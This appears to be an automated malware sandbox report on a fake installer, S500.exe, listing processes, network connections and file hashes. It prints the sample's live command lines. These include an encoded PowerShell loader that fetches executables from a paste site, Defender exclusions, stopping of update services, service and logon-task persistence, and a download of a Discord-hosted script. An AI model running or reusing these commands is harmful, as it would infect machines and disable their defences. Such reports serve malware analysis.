| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\S500.exe
"C:\Users\Admin\AppData\Local\Temp\S500.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe
"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe"
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe
"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe"
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe
"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe"
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe
"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71F.tmp\720.tmp\721.bat C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\where.exe
where node
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe"
C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1704,i,17492305837119228622,9809693347021956828,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1696 /prefetch:2
C:\Windows\system32\cscript.exe
cscript.exe
C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --field-trial-handle=1900,i,17492305837119228622,9809693347021956828,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1912 /prefetch:3
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
C:\Windows\system32\msiexec.exe
msiexec /i nodejs-installer.msi /quiet
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 5453DF835A2D4F6CFD423D7C236B4A4C
C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 93111A9A2132C1A139112D7374CBE05B E Global\MSI0000
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 937633608C50D6DD62BD33707A723DB9
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| DE | 147.45.41.14:12428 | tcp | |
| US | 8.8.8.8:53 | 14.41.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
Files
memory/4808-1-0x00007FFCD9883000-0x00007FFCD9885000-memory.dmp
memory/4808-0-0x0000000000D80000-0x0000000000D88000-memory.dmp
memory/684-8-0x000002AF76440000-0x000002AF76462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wng1rn1p.mxy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/684-13-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp
memory/684-14-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp
memory/684-15-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp
memory/684-27-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe
| MD5 | 232df1e89fad603c20a9dced57983322 |
| SHA1 | 89347e16c723e4cc89a080066a632b9f48a26cb3 |
| SHA256 | 3b5ea4dddab91d998e105206b8cffade1554b065b88e584360710b11a315bfd0 |
| SHA512 | 1adc8603c0757daa7076fe2f6af7b88369841107c9cc964083e8e1fa90adff2b32f87278df48f53591161ce6507c9434a3426b6ec4532020d605495e1f9d2e5a |
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe
| MD5 | d3a0a9f2a3e80ac0b21989c1d5122944 |
| SHA1 | d329ff5a234047c101b5a17f6bc5fc8b796d0aa7 |
| SHA256 | cbf66a9ab4d8749f32b89d73d0bc5ffd56edf8b59e608270bd5c3f08764babe0 |
| SHA512 | 40e651126f7d26442450e0069db1a55f9ad93df70c124ff6c900df61a762fd0e6b6c64e7196bd61b2c7d951996f8dd2e12c11f4151df8ccb03bbe21dbc30d2bf |
C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe
| MD5 | 90cc5edcb6a716028f11b8d8c2bd2871 |
| SHA1 | 773576f73270f7f5e7f732abf71fabfacb721054 |
| SHA256 | 367f7c935b60b0ecdf000d45174cf26cc9fed0cbf1bd35f519a175862e7c2911 |
| SHA512 | 5750fd8c738116e44d328896f865ddb03bd3c37b61f9e4480103e0d113660730a608d352c866e3c048e8b6172fcf23f26d6cbc1a3a38a21f601e1dab6f8269bc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1c00ac32d3b954eb5f5c34f2665a1445 |
| SHA1 | aad5c1509fa3101313a44899e4cd25147388d465 |
| SHA256 | c32ae9f41c72d4f9aa3c203d5326a04049884713aa39c4af535a0632488d18c2 |
| SHA512 | c72b27d3a12a0ec9e6ada5a1cff1d1ea6bb53ae5fdf9c6c65ba1078ad3f86e6e01dfe2152431a8f6cd03de1f2ef712b545dc22706da391d081a3dce1228099f2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 614f88cf39eb3223246afec4bf1463b4 |
| SHA1 | 74d738ee6fdada75ac1ef1645073005e3f6b6cfb |
| SHA256 | 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd |
| SHA512 | 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77 |
memory/684-72-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
memory/4268-85-0x0000000000B10000-0x0000000000B80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\nsExec.dll
| MD5 | ec0504e6b8a11d5aad43b296beeb84b2 |
| SHA1 | 91b5ce085130c8c7194d66b2439ec9e1c206497c |
| SHA256 | 5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962 |
| SHA512 | 3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57 |
memory/4268-89-0x00000000056E0000-0x00000000056FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\71F.tmp\720.tmp\721.bat
| MD5 | 271dec7719a77c4638942d8247d12033 |
| SHA1 | e06d0309acc948f47bd1d2c4ced15a165875e4b6 |
| SHA256 | 33cd4ccab998f90c97b237fec669e31944906c70298187e506934877aa0605bd |
| SHA512 | 3b352583360edbd980ac6885e0fdf431231fc39f8da0553b0457914fb1a2276bf508e3a33dc629857e5d47acb20fcddadee1120b99eaadb761443e6ae7b27226 |
memory/4268-99-0x0000000005CF0000-0x0000000006294000-memory.dmp
memory/4268-100-0x0000000005830000-0x00000000058C2000-memory.dmp
memory/4268-111-0x0000000005810000-0x000000000581A000-memory.dmp
memory/4268-288-0x0000000008EF0000-0x0000000009508000-memory.dmp
memory/4268-290-0x0000000008990000-0x00000000089A2000-memory.dmp
memory/4268-289-0x0000000008A50000-0x0000000008B5A000-memory.dmp
memory/4268-291-0x00000000089F0000-0x0000000008A2C000-memory.dmp
memory/4268-292-0x0000000008B60000-0x0000000008BAC000-memory.dmp
C:\Users\Admin\AppData\Local\Programs\Steam\chrome_100_percent.pak
| MD5 | 6c2827fe702f454c8452a72ea0faf53c |
| SHA1 | 881f297efcbabfa52dd4cfe5bd2433a5568cc564 |
| SHA256 | 2fb9826a1b43c84c08f26c4b4556c6520f8f5eef8ab1c83011031eb2d83d6663 |
| SHA512 | 5619ad3fca8ea51b24ea759f42685c8dc7769dd3b8774d8be1917e0a25fa17e8a544f6882617b4faa63c6c4f29844b515d07db965c8ea50d5d491cdda7281fc5 |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\chrome_200_percent.pak
| MD5 | 77088f98a0f7ea522795baec5c930d03 |
| SHA1 | 9b272f152e19c478fcbd7eacf7356c3d601350ed |
| SHA256 | 83d9243037b2f7e62d0fdfce19ca72e488c18e9691961e2d191e84fb3f2f7a5d |
| SHA512 | 5b19115422d3133e81f17eedbacee4c8e140970120419d6bbfe0e99cf5528d513eea6583548fa8a6259b260d73fab77758ad95137b61fe9056101dd5772e8f4a |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources.pak
| MD5 | 97770ebb513490dfb038bed3bc444128 |
| SHA1 | 2e459ca458879ac8f427080764bb5d668a912235 |
| SHA256 | 75e03df55d7d23c840c09288da270285f17d067cef8709252451c0a8aa1254f4 |
| SHA512 | 7f41708f8f29f0a9730e461c7a5a6780824ec31dac6278abb2c42a50919c10e01ce00aa7e4cdef680d667c467bab4683df90d5db2c61aef8dfdf77c2eb3d8d24 |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\LICENSES.chromium.html
| MD5 | 0ff177fbf2a3873dd573077840e0b8f5 |
| SHA1 | 03d06bc7cd894399a5fc6600a0210f6e3226f92a |
| SHA256 | c4771c9158e31855293ee565db76c9b2c52f84c8a37eda4700cfb149a17fd7eb |
| SHA512 | 3264becd3103c905ab7f9cc034320885f18cbecaa45f582a4a9567ca4bcd620d64dc59fb03532964e775c35f07928a4497f5529cf1b9dc18379e4e9cff02ff8a |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\snapshot_blob.bin
| MD5 | 0c13aba4e77dd56e5f7ec8f8fdd6c9a8 |
| SHA1 | e17eb5b549ac1389cf3761da7d2b2aede1c93fd9 |
| SHA256 | ca7012d6e1478bdd112c485844253e48ef43168c4267ba19be229f0ba2bd6994 |
| SHA512 | f7d49048af8f2dd58c4af0602bda888b948aeb0846f7f27dd7db873f4b185debf5edf3869f8e311e31865e2408aa93af4f0f67a4f1ca0554ff8a8f2fb9a1214a |
C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\LICENSE.electron.txt
| MD5 | 4d42118d35941e0f664dddbd83f633c5 |
| SHA1 | 2b21ec5f20fe961d15f2b58efb1368e66d202e5c |
| SHA256 | 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d |
